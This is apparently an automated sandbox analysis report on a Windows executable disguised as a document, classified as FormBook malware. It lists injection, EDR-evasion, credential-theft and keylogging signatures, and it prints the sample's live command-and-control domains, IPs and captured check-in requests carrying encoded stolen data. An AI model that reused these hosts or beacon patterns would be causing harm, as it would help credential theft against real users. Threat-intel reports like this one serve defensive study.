Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Project Breakdown Doc.exe

Overview

General Information

Sample name:Project Breakdown Doc.exe
Analysis ID:1560859
MD5:bf7d24a56c64e6632ff2ca51f08908f8
SHA1:428d664141dc9d2318dacdf51c4ac9efbbdd3847
SHA256:ade930428485f335d9ab8526b0073be5cdf902c7316bf24bf86c69c85ed67d7e
Tags:exeuser-smica83
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Project Breakdown Doc.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\Project Breakdown Doc.exe" MD5: BF7D24A56C64E6632FF2CA51F08908F8)
    • svchost.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\Project Breakdown Doc.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • VFfhzkOtKq.exe (PID: 5600 cmdline: "C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • powercfg.exe (PID: 7752 cmdline: "C:\Windows\SysWOW64\powercfg.exe" MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • VFfhzkOtKq.exe (PID: 4548 cmdline: "C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7928 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine|base64offset|contains: 0, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ParentImage: C:\Users\user\Desktop\Project Breakdown Doc.exe, ParentProcessId: 7300, ParentProcessName: Project Breakdown Doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ProcessId: 7316, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", CommandLine|base64offset|contains: 0, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ParentImage: C:\Users\user\Desktop\Project Breakdown Doc.exe, ParentProcessId: 7300, ParentProcessName: Project Breakdown Doc.exe, ProcessCommandLine: "C:\Users\user\Desktop\Project Breakdown Doc.exe", ProcessId: 7316, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-22T12:42:31.928508+010028554641A Network Trojan was detected192.168.2.44980843.205.198.2980TCP
                2024-11-22T12:42:34.600224+010028554641A Network Trojan was detected192.168.2.44981543.205.198.2980TCP
                2024-11-22T12:42:37.256489+010028554641A Network Trojan was detected192.168.2.44982143.205.198.2980TCP
                2024-11-22T12:42:46.715244+010028554641A Network Trojan was detected192.168.2.449843172.67.220.3680TCP
                2024-11-22T12:42:49.383453+010028554641A Network Trojan was detected192.168.2.449850172.67.220.3680TCP
                2024-11-22T12:42:52.184148+010028554641A Network Trojan was detected192.168.2.449859172.67.220.3680TCP
                2024-11-22T12:43:01.932322+010028554641A Network Trojan was detected192.168.2.449882194.245.148.18980TCP
                2024-11-22T12:43:04.796233+010028554641A Network Trojan was detected192.168.2.449888194.245.148.18980TCP
                2024-11-22T12:43:08.086956+010028554641A Network Trojan was detected192.168.2.449899194.245.148.18980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Project Breakdown Doc.exeReversingLabs: Detection: 52%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Project Breakdown Doc.exeJoe Sandbox ML: detected
                Source: Project Breakdown Doc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: powercfg.pdbGCTL source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VFfhzkOtKq.exe, 00000005.00000002.2934981003.000000000006E000.00000002.00000001.01000000.00000005.sdmp, VFfhzkOtKq.exe, 00000007.00000000.2336603194.000000000006E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CA4696
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CAC9C7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAC93C FindFirstFileW,FindClose,0_2_00CAC93C
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CAF200
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CAF35D
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CAF65E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CA3A2B
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CA3D4E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CABF27

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49843 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49850 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49821 -> 43.205.198.29:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49888 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49882 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49899 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49859 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49815 -> 43.205.198.29:80
                Source: Joe Sandbox ViewIP Address: 194.245.148.189 194.245.148.189
                Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                Source: Joe Sandbox ViewASN Name: CSLDE CSLDE
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CB25E2
                Source: global trafficHTTP traffic detected: GET /mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8= HTTP/1.1Host: www.qqa79.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflN HTTP/1.1Host: www.1secondlending.oneAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw= HTTP/1.1Host: www.supernutra01.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.qqa79.top
                Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: global trafficDNS traffic detected: DNS query: www.wine-drinkers.club
                Source: unknownHTTP traffic detected: POST /6pwo/ HTTP/1.1Host: www.1secondlending.oneAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brContent-Length: 200Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.1secondlending.oneReferer: http://www.1secondlending.one/6pwo/User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36Data Raw: 41 46 46 3d 44 65 77 72 42 73 32 6d 54 39 6c 6d 71 53 30 68 38 78 6f 2f 46 68 77 57 47 42 70 4b 5a 57 54 4e 50 78 35 6e 73 32 31 56 41 55 6b 6f 62 58 71 71 64 5a 45 48 53 51 4e 7a 6c 79 46 4d 68 37 69 6b 39 2f 4f 64 72 48 41 61 4d 6b 41 70 41 52 62 65 75 55 6e 4f 6a 32 6f 30 62 45 72 51 73 41 4d 41 75 39 32 55 4a 41 6b 6d 76 37 63 4a 50 38 4c 6a 75 6a 79 62 56 76 61 63 51 75 6c 79 67 38 63 30 36 70 59 6f 41 75 33 37 65 6e 6a 69 67 6f 50 45 5a 38 63 68 6c 49 65 57 43 4d 6b 65 55 53 58 79 73 46 69 32 43 72 48 35 36 58 39 6f 6f 42 67 2b 52 6a 4b 34 67 51 45 2f 2b 4a 78 50 70 70 59 67 52 41 3d 3d Data Ascii: AFF=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXysFi2CrH56X9ooBg+RjK4gQE/+JxPppYgRA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:14 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 